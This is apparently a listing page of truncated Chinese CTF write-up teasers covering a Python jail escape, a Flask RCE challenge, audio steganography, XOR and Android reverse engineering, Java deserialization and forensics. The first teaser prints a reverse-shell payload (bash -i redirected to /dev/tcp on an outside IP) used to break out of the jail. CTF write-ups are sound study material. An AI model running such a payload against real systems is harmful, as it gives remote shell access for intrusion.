WEEK2MISCWelcome_jailpython的越狱 exp反弹shell 12345678exp='__import__("os").system("bash -c \'bash -i >& /dev/tcp/1.2.3.4/777 0>&1\'")'exp_f='__b

WEEK1WEBez_rce访问网址发现给了源代码 1234567891011121314151617181920from flask import Flask, requestimport subprocessapp = Flask(__name__)@app.route("/")def index(): return open(__file__).read()@app

MISChiden题目给了两个附件 第一个附件的提示是想告诉你用rot13+rot47去解密，那就直接去解密 得到加密的脚本，接下来直接去写解密的脚本 1234567891011121314151617181920212223import wave# 打开隐藏数据的 WAV 文件with wave.open("hiden.wav", "rb") as f

RExor先用exeinfo查看exe文件 得知是64位的c编译的文件，就拿ida去反编译 大致的解密思路就是用数组里面的密文去异或0x24，直接写py脚本 找到密文所在位置 12345678910cipher=[0x49, 0x4B, 0x41, 0x47, 0x50, 0x42, 0x5F, 0x41, 0x1C, 0x16, 0x46, 0x10, 0x13, 0x1C, 0x40,

REBabyAndroid拿到了一个apk文件，和一段流量文件，先去jadx把apk反编译然后搜索流量的域名（yuanshen.com） 找到关键的加密函数 理一下加密逻辑，收首先从Sex.jpg中加载了一个类，先去看看怎么加载的 找到loadData函数 发现是通过rc4解密得到的，并且给了解密的密钥，用大厨去解密一下 得到了dex文件，用jadx再去反编译一下，简单介绍一下dex的文件

WEBImpossibleUnser题目给源码，查看一下源码，发现在/ctf下的可疑的源码 1234567891011121314151617181920public void handle(HttpExchange httpExchange) throws IOException { InputStream requestBody = httpExchange.g

easy_mathnc连接发现是根据4个数字判断能不能实现24点，输入True或False，输入的True或False按顺序变成1和0，再解码就能得到flag，直接用脚本实现 1234567891011121314151617181920212223242526272829from exp1 import *from pwn import *import refrom itertools impo

MISCBaldur’s Gate 3 Complete Spell List📎flag.zip 附件是json文件，里面全是法术名称 猜测先将法术名都提取出来，每一对{}为一行，不同的法术名用#分割 123456789101112131415161718192021222324import jsondef traverse_json(data,line): if isinstance(

MISCex1t根据空白的提示中的 “c 的标准” ，很自然想到 “\x00” 字符截断，测试发现 python 执行脚本时某行中间如果出现 “\x00” ，这一行后面的就被舍弃（包括换行），直接和下一行拼接。所以可以将三引号用 “\x00\n” 分隔。 12345678910111213141516171819from pwn import *import sysLOCAL = len(sys.

MISCcheckin是一个前端小游戏，查看源码game.js发现js代码被混淆了，去解混淆（https://obf-io.deobfuscate.io/） 分析之后 去解密红框部分 得到 flag{We1c0m3_VCTF_2024} f0rensicmaster终极套娃题 给了你一个镜像文件，这边要用FTK Imager挂载，注意：在win10机上挂载，因为之后会解bitlocker在wi